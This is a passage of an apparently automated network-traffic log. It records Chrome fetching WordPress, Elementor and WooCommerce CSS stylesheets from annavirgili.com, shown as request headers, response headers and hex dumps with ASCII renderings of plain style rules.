                                                                                                          2024-12-12 11:58:08 UTC16384INData Raw: 2e 70 72 6f 64 75 63 74 2e 65 6c 65 6d 65 6e 74 6f 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 72 6f 64 75 63 74 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2d 74 61 62 6c 65 74 2d 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 3a 6e 6f 74 28 5b 63 6c 61 73 73 2a 3d 22 2d 2d 6c 61 79 6f 75 74 2d 73 74 61 63 6b 65 64 22 5d 29 3a 6e 6f 74 28 5b 63 6c 61 73 73 2a 3d 22 2d 2d 6c 61 79 6f 75 74 2d 61 75 74 6f 22 5d 29 20 66 6f 72 6d 2e 63 61 72 74 2e 76 61 72 69 61 74 69 6f 6e 73 5f 66 6f 72 6d 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 76 61 72 69 61 74 69 6f 6e 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72
                                                                                                          Data Ascii: .product.elementor .elementor-widget-woocommerce-product-add-to-cart.elementor-add-to-cart-tablet--align-center:not([class*="--layout-stacked"]):not([class*="--layout-auto"]) form.cart.variations_form .woocommerce-variation-add-to-cart,.woocommerce div.pr
                                                                                                          2024-12-12 11:58:08 UTC16384INData Raw: 66 74 3a 6e 6f 74 28 5b 63 6c 61 73 73 2a 3d 22 2d 2d 6c 61 79 6f 75 74 2d 73 74 61 63 6b 65 64 22 5d 29 3a 6e 6f 74 28 5b 63 6c 61 73 73 2a 3d 22 2d 2d 6c 61 79 6f 75 74 2d 61 75 74 6f 22 5d 29 20 66 6f 72 6d 2e 63 61 72 74 3a 6e 6f 74 28 2e 67 72 6f 75 70 65 64 5f 66 6f 72 6d 29 3a 6e 6f 74 28 2e 76 61 72 69 61 74 69 6f 6e 73 5f 66 6f 72 6d 29 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 2e 65 6c 65 6d 65 6e 74 6f 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 72 6f 64 75 63 74 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2d 6d 6f 62 69 6c 65 2d 2d 61 6c 69 67 6e 2d 6c 65 66 74 5b 63 6c 61 73 73 2a 3d 22 2d 2d 6c 61
                                                                                                          Data Ascii: ft:not([class*="--layout-stacked"]):not([class*="--layout-auto"]) form.cart:not(.grouped_form):not(.variations_form),.woocommerce div.product.elementor .elementor-widget-woocommerce-product-add-to-cart.elementor-add-to-cart-mobile--align-left[class*="--la
                                                                                                          2024-12-12 11:58:08 UTC16384INData Raw: 6f 2d 63 61 72 74 2d 6c 61 70 74 6f 70 2d 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 63 6c 61 73 73 2a 3d 22 2d 2d 6c 61 79 6f 75 74 2d 61 75 74 6f 22 5d 20 2e 65 2d 61 74 63 2d 71 74 79 2d 62 75 74 74 6f 6e 2d 68 6f 6c 64 65 72 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 63 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2d 6c 61 70 74 6f 70 2d 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 63 6c 61 73 73 2a 3d 22 2d 2d 6c 61 79 6f 75 74 2d 73 74 61 63 6b 65 64 22 5d 20 2e 65 2d 61 74 63 2d 71 74 79 2d 62 75 74 74 6f 6e 2d 68 6f 6c 64 65 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 65 6e 64 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 65 6e 64 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65
                                                                                                          Data Ascii: o-cart-laptop--align-right[class*="--layout-auto"] .e-atc-qty-button-holder,.elementor-widget-wc-add-to-cart.elementor-add-to-cart-laptop--align-right[class*="--layout-stacked"] .e-atc-qty-button-holder{-webkit-box-pack:end;-ms-flex-pack:end;justify-conte
                                                                                                          2024-12-12 11:58:08 UTC16384INData Raw: 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 6f 6f 2d 6d 65 74 61 2d 2d 76 69 65 77 2d 74 61 62 6c 65 20 2e 70 72 6f 64 75 63 74 5f 6d 65 74 61 20 2e 64 65 74 61 69 6c 2d 6c 61 62 65 6c 7b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 38 70 78 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 6f 6f 2d 6d 65 74 61 2d 2d 76 69 65 77 2d 73 74 61 63 6b 65 64 20 2e 70 72 6f 64 75 63 74 5f 6d 65 74 61 20 2e 64 65 74 61 69 6c 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 2e 65 6c 65 6d 65 6e 74 6f 72 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 72
                                                                                                          Data Ascii: lay:-webkit-box;display:-ms-flexbox;display:flex}.elementor-woo-meta--view-table .product_meta .detail-label{min-width:108px}.elementor-woo-meta--view-stacked .product_meta .detail-container{display:block}.woocommerce div.product.elementor .woocommerce-pr
                                                                                                          2024-12-12 11:58:08 UTC16384INData Raw: 72 2d 77 69 64 67 65 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 65 6e 75 2d 63 61 72 74 2e 74 6f 67 67 6c 65 2d 69 63 6f 6e 2d 2d 62 61 67 2d 6d 65 64 69 75 6d 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6d 65 6e 75 2d 63 61 72 74 5f 5f 74 6f 67 67 6c 65 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 69 63 6f 6e 20 69 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 38 65 34 22 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 65 6e 75 2d 63 61 72 74 2e 74 6f 67 67 6c 65 2d 69 63 6f 6e 2d 2d 62 61 67 2d 73 6f 6c 69 64 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6d 65 6e 75 2d 63 61 72 74 5f 5f 74 6f 67 67 6c 65 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 69 63 6f 6e 20 69 3a 62 65 66 6f 72 65
                                                                                                          Data Ascii: r-widget-woocommerce-menu-cart.toggle-icon--bag-medium .elementor-menu-cart__toggle .elementor-button-icon i:before{content:"\e8e4"}.elementor-widget-woocommerce-menu-cart.toggle-icon--bag-solid .elementor-menu-cart__toggle .elementor-button-icon i:before
                                                                                                          2024-12-12 11:58:08 UTC16384INData Raw: 2d 6e 6f 72 6d 61 6c 2d 63 6f 6c 6f 72 2c 69 6e 68 65 72 69 74 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 6f 70 61 63 69 74 79 3a 2e 36 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 68 65 63 6b 6f 75 74 2d 70 61 67 65 20 3a 3a 2d 6d 73 2d 69 6e 70 75 74 2d 70 6c 61 63 65 68 6f 6c 64 65 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 66 6f 72 6d 73 2d 66 69 65 6c 64 73 2d 6e 6f 72 6d 61 6c 2d 63 6f 6c 6f 72 2c 69 6e 68 65 72 69 74 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 6f 70 61 63 69 74 79 3a 2e 36 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 68 65 63 6b 6f 75 74 2d 70 61 67 65 20 3a 3a 70 6c 61 63 65 68 6f 6c 64
                                                                                                          Data Ascii: -normal-color,inherit);font-family:inherit;opacity:.6}.elementor-widget-woocommerce-checkout-page ::-ms-input-placeholder{color:var(--forms-fields-normal-color,inherit);font-family:inherit;opacity:.6}.elementor-widget-woocommerce-checkout-page ::placehold


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          25192.168.2.2449796147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:07 UTC610OUTGET /wp-content/plugins/fami-templatekits/assets/css/fmtpl-addons.css?ver=1.0.4 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:08 UTC267INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:08 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 10 Aug 2021 13:55:31 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 5879
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:08 UTC5879INData Raw: 2e 66 6d 74 70 6c 2d 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 20 73 76 67 20 7b 0a 20 20 77 69 64 74 68 3a 20 31 65 6d 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 65 6d 3b 0a 7d 0a 2e 66 6d 74 70 6c 2d 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 20 2e 66 6d 74 70 6c 2d 77 69 64 67 65 74 2d 74 69 74 6c 65 20 2e 68 69 67 68 6c 69 67 68 74 20 7b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 7d 0a 0a 2e 66 6d 74 70 6c 2d 65 6c 65 6d 65 6e 74 6f 72 2d 6d 61 69 6e 2d 73 77 69 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6a
                                                                                                          Data Ascii: .fmtpl-elementor-widget svg { width: 1em; height: 1em;}.fmtpl-elementor-widget .fmtpl-widget-title .highlight { font-weight: 900; color: #000;}.fmtpl-elementor-main-swiper .elementor-swiper-button { display: flex; align-items: center; j


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          26192.168.2.2449797147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:08 UTC594OUTGET /wp-content/uploads/elementor/css/global.css?ver=1709081757 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:08 UTC269INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:08 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 28 Feb 2024 00:55:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 107692
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:08 UTC16384INData Raw: 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 68 65 61 64 69 6e 67 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 68 65 61 64 69 6e 67 2d 74 69 74 6c 65 7b 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 20 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 70 72 69 6d 61 72 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 20 29 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 70 72 69 6d 61 72 79 2d 66 6f 6e 74 2d 77 65 69 67 68 74 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 69 6d 61 67 65 20 2e 77 69 64 67 65 74
                                                                                                          Data Ascii: .elementor-widget-heading .elementor-heading-title{color:var( --e-global-color-primary );font-family:var( --e-global-typography-primary-font-family ), Sans-serif;font-weight:var( --e-global-typography-primary-font-weight );}.elementor-widget-image .widget
                                                                                                          2024-12-12 11:58:08 UTC16384INData Raw: 6c 2d 63 61 72 6f 75 73 65 6c 2d 70 6f 73 74 73 20 2e 66 6d 74 70 6c 2d 70 6f 73 74 2d 72 65 61 64 6d 6f 72 65 2c 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 66 6d 74 70 6c 2d 63 61 72 6f 75 73 65 6c 2d 70 6f 73 74 73 20 2e 66 6d 74 70 6c 2d 70 6f 73 74 2d 72 65 61 64 6d 6f 72 65 20 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 61 63 63 65 6e 74 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 20 29 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 61 63 63 65 6e 74 2d 66 6f 6e 74 2d 77 65 69 67 68 74 20 29 3b 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d
                                                                                                          Data Ascii: l-carousel-posts .fmtpl-post-readmore, .elementor-widget-fmtpl-carousel-posts .fmtpl-post-readmore a{font-family:var( --e-global-typography-accent-font-family ), Sans-serif;font-weight:var( --e-global-typography-accent-font-weight );color:var( --e-global-
                                                                                                          2024-12-12 11:58:08 UTC16384INData Raw: 74 79 70 6f 67 72 61 70 68 79 2d 61 63 63 65 6e 74 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 20 29 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 61 63 63 65 6e 74 2d 66 6f 6e 74 2d 77 65 69 67 68 74 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 66 6d 74 70 6c 2d 63 6f 75 6e 74 64 6f 77 6e 20 2e 62 6f 78 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 66 6d 74 70 6c 2d 63 6f 75 6e 74 64 6f 77 6e 20 2e 62 6f 78 2d 63 6f 75 6e 74 20 2e 6e 75 6d 7b 66 6f 6e 74 2d
                                                                                                          Data Ascii: typography-accent-font-family ), Sans-serif;font-weight:var( --e-global-typography-accent-font-weight );}.elementor-widget-fmtpl-countdown .box-count{background-color:var( --e-global-color-primary );}.elementor-widget-fmtpl-countdown .box-count .num{font-
                                                                                                          2024-12-12 11:58:09 UTC16384INData Raw: 6f 76 65 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 20 29 3b 66 69 6c 6c 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 66 6d 74 70 6c 2d 63 61 72 6f 75 73 65 6c 2d 70 72 6f 64 75 63 74 73 20 2e 66 6d 74 70 6c 2d 70 72 6f 64 75 63 74 73 20 2e 66 6d 74 70 6c 2d 62 74 6e 2d 74 65 78 74 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 61 63 63 65 6e 74 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 20 29 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d
                                                                                                          Data Ascii: over{color:var( --e-global-color-primary );fill:var( --e-global-color-primary );}.elementor-widget-fmtpl-carousel-products .fmtpl-products .fmtpl-btn-text{font-family:var( --e-global-typography-accent-font-family ), Sans-serif;font-weight:var( --e-global-
                                                                                                          2024-12-12 11:58:09 UTC16384INData Raw: 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 61 63 63 65 6e 74 2d 66 6f 6e 74 2d 77 65 69 67 68 74 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 70 6f 73 74 73 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 70 61 67 69 6e 61 74 69 6f 6e 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 73 65 63 6f 6e 64 61 72 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 20 29 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 73 65 63 6f 6e 64 61 72 79 2d 66 6f 6e 74 2d 77 65 69 67 68 74 20 29 3b 7d 2e 65 6c
                                                                                                          Data Ascii: serif;font-weight:var( --e-global-typography-accent-font-weight );}.elementor-widget-posts .elementor-pagination{font-family:var( --e-global-typography-secondary-font-family ), Sans-serif;font-weight:var( --e-global-typography-secondary-font-weight );}.el


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          27192.168.2.2449798147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:08 UTC606OUTGET /wp-content/uploads/elementor/css/post-8052462589213.css?ver=1733126350 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:08 UTC268INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:08 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Mon, 02 Dec 2024 07:59:10 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 17785
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:08 UTC16384INData Raw: 2e 65 6c 65 6d 65 6e 74 6f 72 2d 38 30 35 32 34 36 32 35 38 39 32 31 33 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 66 39 36 37 36 66 37 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 39 30 76 68 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 38 30 35 32 34 36 32 35 38 39 32 31 33 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 66 39 36 37 36 66 37 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 70 78 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 38 30 35 32 34 36 32 35 38 39 32 31 33 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65
                                                                                                          Data Ascii: .elementor-8052462589213 .elementor-element.elementor-element-f9676f7 > .elementor-container{min-height:90vh;}.elementor-8052462589213 .elementor-element.elementor-element-f9676f7{margin-top:0px;margin-bottom:0px;}.elementor-8052462589213 .elementor-eleme
                                                                                                          2024-12-12 11:58:08 UTC1401INData Raw: 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 38 36 39 65 35 33 64 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 33 35 76 68 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 38 30 35 32 34 36 32 35 38 39 32 31 33 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 38 36 39 65 35 33 64 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 34 30 70 78 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 38 30 35 32 34 36 32 35 38 39 32 31 33 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 65 62 64 30 30 65 63 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72
                                                                                                          Data Ascii: t.elementor-element-869e53d > .elementor-container{min-height:35vh;}.elementor-8052462589213 .elementor-element.elementor-element-869e53d{margin-top:0px;margin-bottom:40px;}.elementor-8052462589213 .elementor-element.elementor-element-ebd00ec > .elementor


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          28192.168.2.2449800147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:09 UTC596OUTGET /wp-content/uploads/elementor/css/post-336.css?ver=1709081758 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:09 UTC267INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:09 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 28 Feb 2024 00:55:58 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 5095
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:09 UTC5095INData Raw: 2e 65 6c 65 6d 65 6e 74 6f 72 2d 33 33 36 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 32 36 38 66 64 66 66 3a 6e 6f 74 28 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6d 6f 74 69 6f 6e 2d 65 66 66 65 63 74 73 2d 65 6c 65 6d 65 6e 74 2d 74 79 70 65 2d 62 61 63 6b 67 72 6f 75 6e 64 29 2c 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 33 33 36 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 32 36 38 66 64 66 66 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6d 6f 74 69 6f 6e 2d 65 66 66 65 63 74 73 2d 63 6f 6e 74 61 69 6e 65 72 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6d 6f 74 69 6f 6e 2d 65 66 66 65 63 74 73 2d 6c 61 79 65 72 7b 62 61 63 6b 67 72 6f
                                                                                                          Data Ascii: .elementor-336 .elementor-element.elementor-element-268fdff:not(.elementor-motion-effects-element-type-background), .elementor-336 .elementor-element.elementor-element-268fdff > .elementor-motion-effects-container > .elementor-motion-effects-layer{backgro


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          29192.168.2.2449801147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
